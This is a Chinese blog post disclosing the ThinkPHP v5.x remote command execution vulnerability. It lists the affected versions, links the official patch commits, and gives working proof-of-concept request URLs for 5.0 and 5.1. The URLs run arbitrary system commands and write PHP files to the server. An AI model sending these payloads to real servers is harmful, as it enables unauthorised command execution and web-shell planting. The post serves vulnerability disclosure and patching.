[康哥学网]康哥博客-康哥工作室

康哥学网-康哥网络工作室

ThinkPHP v5.x命令执行漏洞

百度已收录

2019-1-4 康哥工作室 计算机新闻

漏洞影响

版本: Thinkphp v5.1.29(影响版本<5.1.31和<5.0.23)

相关注明

漏洞分析仅用于学习!!!一切实际攻击利用行为概不负责。

漏洞修复

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

漏洞构造

5.0版本POC(不唯一)

命令执行:public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
文件写入:public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=mracat.php&vars[1][1]=<?php phpinfo();?>

5.1版本POC(不唯一)

命令执行:public/index.php?s=index/\think\Request/input&filter=system&data=系统命令
文件写入:public/index.php?s=index/\think\template\driver\file/write&cacheFile=mracat.php&content=<?php phpinfo();?>

标签: 漏洞

分享本文至:

©版权所有:《[康哥学网]康哥博客-康哥工作室》 => 《ThinkPHP v5.x命令执行漏洞
本文地址:https://blog.kggzs.com/post-224.html
除非注明,文章均为 《[康哥学网]康哥博客-康哥工作室》 原创,欢迎转载!转载请注明本文地址,谢谢。

网站地图